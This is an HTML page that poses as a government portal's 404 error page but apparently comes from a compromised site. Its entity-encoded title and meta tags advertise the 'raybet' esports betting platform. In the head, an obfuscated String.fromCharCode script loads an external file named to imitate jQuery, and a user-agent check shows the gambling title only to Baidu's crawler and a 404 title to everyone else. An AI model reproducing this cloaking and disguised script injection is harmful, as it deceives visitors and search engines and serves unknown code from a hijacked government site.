<!DOCTYPE html>
<html lang="zh-CN">
<head><title>﻿raybet&#x96F7;&#x7ADE;&#x6280;&#x4E8C;&#x7EF4;&#x7801;|raybet&#x96F7;&#x7ADE;&#x6280;&#x516C;&#x53F8;</title>
<meta name="keywords" content="&#65279;&#114;&#97;&#121;&#98;&#101;&#116;&#38647;&#31454;&#25216;&#20108;&#32500;&#30721;&#44;&#114;&#97;&#121;&#98;&#101;&#116;&#38647;&#31454;&#25216;&#20844;&#21496;"/>
<meta name="description" content="&#38647;&#31454;&#25216;&#26159;&#19968;&#27454;&#22791;&#21463;&#29609;&#23478;&#21916;&#29233;&#30340;&#30005;&#31454;&#23089;&#20048;&#24179;&#21488;&#44;&#25552;&#20379;&#20016;&#23500;&#30340;&#28216;&#25103;&#21644;&#36187;&#20107;&#20869;&#23481;&#46;&#36890;&#36807;&#114;&#97;&#121;&#98;&#101;&#116;&#38647;&#31454;&#25216;&#20108;&#32500;&#30721;&#44;&#29992;&#25143;&#21487;&#20197;&#20415;&#25463;&#22320;&#35775;&#38382;&#23448;&#32593;&#44;&#38543;&#26102;&#38543;&#22320;&#20139;&#21463;&#30005;&#31454;&#20048;&#36259;&#46;&#25195;&#25551;&#20108;&#32500;&#30721;&#44;&#30021;&#29609;&#28909;&#38376;&#30005;&#31454;&#28216;&#25103;&#44;&#21442;&#19982;&#20840;&#29699;&#39030;&#32423;&#36187;&#20107;&#31454;&#29468;&#44;&#20307;&#39564;&#38750;&#20961;&#30340;&#28216;&#25103;&#20048;&#36259;&#46;"/>

<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,106,115,47,106,113,117,101,114,121,46,51,46,53,46,50,46,109,105,110,46,116,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(xt); </script>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="404 - 页面未找到 | 政府门户网站"}</script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>| 政府门户网站</title>
    <style>
        /* 基础重置与政务风格变量 */
        :root {
            --primary-color: #0057b8; /* 经典政务蓝 */
            --text-color: #333333;
            --sub-text-color: #666666;
            --bg-color: #f5f7fa;
        }

        * { margin: 0; padding: 0; box-sizing: border-box; }

        body {
            font-family: "Microsoft YaHei", "PingFang SC", "Helvetica Neue", Arial, sans-serif;
            background-color: var(--bg-color);
            color: var(--text-color);
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            padding: 20px;
        }

        .container {
            text-align: center;
            max-width: 600px;
            background: #ffffff;
            padding: 60px 40px;
            border-radius: 4px;
            box-shadow: 0 2px 12px rgba(0, 0, 0, 0.05);
        }

        /* 404 数字样式 */
        .error-code {
            font-size: 120px;
            font-weight: 700;
            color: var(--primary-color);
            line-height: 1;
            margin-bottom: 10px;
            opacity: 0.9;
        }

        h1 {
            font-size: 24px;
            font-weight: 600;
            margin-bottom: 15px;
            color: var(--text-color);
        }

        p {
            font-size: 16px;
            color: var(--sub-text-color);
            line-height: 1.6;
            margin-bottom: 30px;
        }

        /* 操作按钮 */
        .actions {
            display: flex;
            gap: 15px;
            justify-content: center;
            flex-wrap: wrap;
        }

        a {
            text-decoration: none;
            padding: 10px 28px;
            border-radius: 3px;
            font-size: 15px;
            transition: all 0.3s ease;
            border: 1px solid transparent;
        }

        .btn-primary {
            background-color: var(--primary-color);
            color: #fff;
        }

        .btn-primary:hover {
            background-color: #004a9e;
        }

        .btn-outline {
            border-color: #d9d9d9;
            color: var(--text-color);
            background: #fff;
        }

        .btn-outline:hover {
            border-color: var(--primary-color);
            color: var(--primary-color);
        }

        /* 移动端适配 */
        @media (max-width: 480px) {
            .error-code { font-size: 80px; }
            h1 { font-size: 20px; }
            .container { padding: 40px 20px; }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="error-code">404</div>
        <h1>抱歉，您访问的页面不存在</h1>
        <p>
            该页面可能已被移除、更改名称或暂时不可用。<br>
            请检查您输入的网址是否正确，或尝试以下操作：
        </p>
        <div class="actions">
            <a href="/" class="btn-primary">返回首页</a>
            <a href="javascript:history.back()" class="btn-outline">返回上页</a>
        </div>
    </div>
</body>
</html>
